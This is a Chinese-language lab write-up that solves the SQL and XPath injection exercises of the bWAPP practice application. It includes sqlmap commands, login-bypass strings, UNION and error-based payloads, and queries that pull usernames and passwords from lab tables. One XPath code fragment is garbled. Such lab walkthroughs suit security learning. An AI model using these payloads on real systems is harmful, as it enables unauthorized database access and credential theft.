大家好，又见面了，我是你们的朋友全栈君。

文章目录

• SQL Injection (GET/Search)
• SQL Injection (GET/Select)
• SQL Injection (POST/Search)
• SQL Injection (POST/Select)
• SQL Injection (AJAX/JSON/jQuery)
• SQL Injection (CAPTCHA)
• SQL Injection (Login Form/Hero)
• SQL Injection (Login Form/User)
• SQL Injection (SQLite)
• SQL Injection – Stored (Blog)
• SQL Injection – Stored (SQLite)
• SQL Injection – Stored (User-Agent)
• SQL Injection – Stored (XML)
• XML/XPath Injection (Login Form)
• XML/XPath Injection (Search)

SQL Injection (GET/Search)

这里的题都可以用sqlmap解决 sqlmap详解，可以参考这篇文章

构造sqlmap -u "http://192.168.41.137/sqli_1.php?title=a&action=search" -p title --cookie "security_level=0; PHPSESSID=bsmemp4vk1015lbju2csqchr63" 这里需要加cooike值，靶场需要登录 然后就会自动构造

SQL Injection (GET/Select)

使用order by 尝试可知，能试到7， 使用联合查询试一下，可以，然后就开始查库，查表，查列

SQL Injection (POST/Search)

使用了post传参而已 解决方法和get一样

SQL Injection (POST/Select)

通过抓包可以知道，不仅是post传参，而且title改成了movie, 解决方法一样

SQL Injection (AJAX/JSON/jQuery)

首先解释一下AJAX,Ajax 即“Asynchronous Javascript And XML”（异步 JavaScript 和 XML），通过在后台与服务器进行少量数据交换，Ajax 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下，对网页的某部分进行更新。比如我们使用百度的时候，有个功能叫“搜索预测”，当你输入第一个字的时候，下拉框里就会出现大量可能的关键词候选，这个用的就是ajax技术，而它的返回值一般是json/xml格式的，jQuery中提供实现ajax的方法（因为js很容易捕捉客户端的按键行为）

抓包推断输入的a是get传参方法，但 URL为sqli_10-2.php?title=a但是实际浏览器看到的页面是，sqli_10-1.php,观察源代码发现

sqli_10-1.php将参数通过getJSON方法传给sqli_10-2.php，sqli_10-2.php立马执行查询，所以真正的注入点在sqli_10-2.php的title参数 当然，sqlmap能解决

SQL Injection (CAPTCHA)

进入后，直接输点东西，观看url，即可知道点在哪里

SQL Injection (Login Form/Hero)

用sql语句构造绕过， admin aa ' or 'a' = 'a 这是我采用的一种写法

用sqlmap的话， 这样构造 sqlmap -u "http://192.168.248.130/bWAPP/sqli_3.php" --data "login=111&password=111&form=submit" --cookie "security_level=0; PHPSESSID=5913f596beeaf73e40495ff8037750a9" -p login 用给定的payload进行post注入

SQL Injection (Login Form/User)

order by 先爆破 当为9的时候

当为10的时候，

因此我们就可以相信他是9 ' UNION SELECT 1,2,3,4,5,6,7,8,9#在使用联合查询爆破回显位 但尝试后感觉不行,最后搜索到的大佬是这样写的 ' UNION SELECT 1,2,'356a192b7913b04c54574d18c28d46e6395428ab',4,5,6,7,8,9# 原因http://www.mamicode.com/info-detail-2239051.html

SQL Injection (SQLite)

SQLite 简介

SQLite是一个软件库，实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。SQLite是一个增长最快的数据库引擎，这是在普及方面的增长，与它的尺寸大小无关。SQLite 源代码不受版权限制。

sqlmap可以解决

SQL Injection – Stored (Blog)

用sqlmap将post参数加上去

SQL Injection – Stored (SQLite)

meetsec’,’’); meetsec’,sqlite_version()); meetsec’,(select name from sqlite_master where type=‘table’)); meetsec’,(select login||”:”||password from users)) – – 新的独立的注入方法

SQL Injection – Stored (User-Agent)

抓包，修改UA为单引号，出现报错 继续 1' ,(select version()))# 1' ,(select user()))#,这样都可以查询到

SQL Injection – Stored (XML)

构造post参数 <reset><login>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</login><secret>bee'+(select 1 and row(1,1)>(select count(*),concat(CONCAT((SELECT @@version)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'</secret></reset>

XML/XPath Injection (Login Form)

XPath其实和sql查询挺像，区别在于sql查询是在数据库中查数据，Xpath是在xml中找信息，既然如此只要熟悉一下Xpath的语法，知道它的特点即可找到对应的注入思路

在 XPath 中，有七种类型的节点：元素、属性、文本、命名空间、处理指令、注释以及文档节点（或称为根节点）。节点之间存在父、子、先辈、后代、同胞关系，以t3stt3st.xml为例 根节点<root1> 、元素节点<user><username><key><hctfadmin>、属性节点name='user1' <root1>是<user>和<htcfadmin>的父节点，同时也是<user><hctfadmin><username><key>的先辈。和是同胞节点。

构造meetset' or '1'='1,成功

XML/XPath Injection (Search)

$xml = simplexml_load_file(“passwords/heroes.xml”);

// XPath search // result = x m l − > x p a t h ( ” / / h e r o [ g e n r e = ′ xml->xpath(“//hero[genre = ‘ xml−>xpath(“//hero[genre=′genre’]/movie”);

那么我们补全我们需要但他所缺乏的 构造payload')]/password | a[contains(a,' 这样完整的语句就是 result = xml->xpath("//hero[contains(genre, '')]/password | a[contains(a,'')]/movie"); 即 result = xml->xpath("//hero/password");

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 举报，一经查实，本站将立刻删除。

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/190423.html原文链接：https://javaforall.cn